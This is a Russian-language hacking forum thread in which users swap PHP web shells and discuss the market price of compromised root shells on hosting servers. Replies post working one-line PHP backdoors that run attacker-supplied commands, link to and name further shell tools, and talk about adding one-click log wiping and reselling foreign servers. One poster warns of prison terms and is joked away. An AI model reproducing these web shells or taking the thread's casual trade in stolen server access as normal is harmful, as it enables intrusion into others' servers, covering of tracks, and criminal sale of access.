Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1
RSS
Shell, подилитесь опытом
 
Знает ли кто нибудь хорошие шеллы кроме phpShell и rp57shell ?
и кстаита в целях спортивного интереса сколько нынче стоит рутовый шел
 
Вот те отличнейший шелл
Код
<? passthru($_GET["c"]); ?>

Просто добать воды  :o   ;)   :)
 
рутовый шелл от хостинга - смотря какого, цена может достигать и выше 1к

http://zaco.cup.su/uploads/SmWsHbZ.txt sql-менеджер/управление/интерпретатор команд
отличается малым весом.

из аналогов их куча - NFM от хосе, раньше был приватным, так как содержал ценную базу эксплоитов, которую можно было примнь непосредственно "на месте", cybershell от Cyberlords и т.п и т.д.

<? system($cmd); ?>  в тему "отличных шеллов"
 
Цитата
<? system($cmd); ?> в тему "отличных шеллов"
так я тоже могу но хочется чтобы было удобно и куча полезного

я вот хочю написать свой нечим не уступаюший другим и добавить туда очень полезную штуку авто чистку логово чтобы не парится а нажать всего одну кнопку! :D
 
как определить стоимость шела от чего это зависит какие дорожи наши или забугорные??
 
Цитата
как определить стоимость шела от чего это зависит какие дорожи наши или забугорные??
я не продаю и не пакупаю мне просто интерестно
 
Говоря откровенно - дороже те, которые актуальнее. Актуальность определяется нуждой трафика по определённой геолкации, кол-вом клиентов, соответственно со всеми вытекающими.
 
Цитата
я вот хочю написать свой нечим не уступаюший другим и добавить туда очень полезную штуку авто чистку логово чтобы не парится а нажать всего одну кнопку!

Логвайперов не существует разве?

Интесные разработки подобного рода модно делать на AJAX, не повторяться стандартами, в которых, поверь, всё, что крайне необходимо - существует, если ты про обнавление одной кнопкой через JS XML Http Request.
 
не они конечно сушествуют но хочется все это дело обьеденить чтоб удобно было
 
ну вот например я хочю продать шелл забугорный во сколько мне за него даду (денег а не лет)
 
Простите, но если всё это обьдинить, он будет чрезчур переполнен (как по размеру, так и функциям), и разве надо ли столько всего в обычный интерпретатор, с WEB-интерфейсом?

Дубль два:
Цитата
рутовый шелл от хостинга - смотря какого, цена может достигать и выше 1к
 
Цитата
ZEROska пишет:
и кстаита в целях спортивного интереса сколько нынче стоит рутовый шел
Иногда цена шелла - 2-3 года лишения свободы (и больше)
 
Цитата
Иногда цена шелла - 2-3 года лишения свободы (и больше)

Цитата
сколько мне за него даду (денег а не лет)
Страницы: 1
Читают тему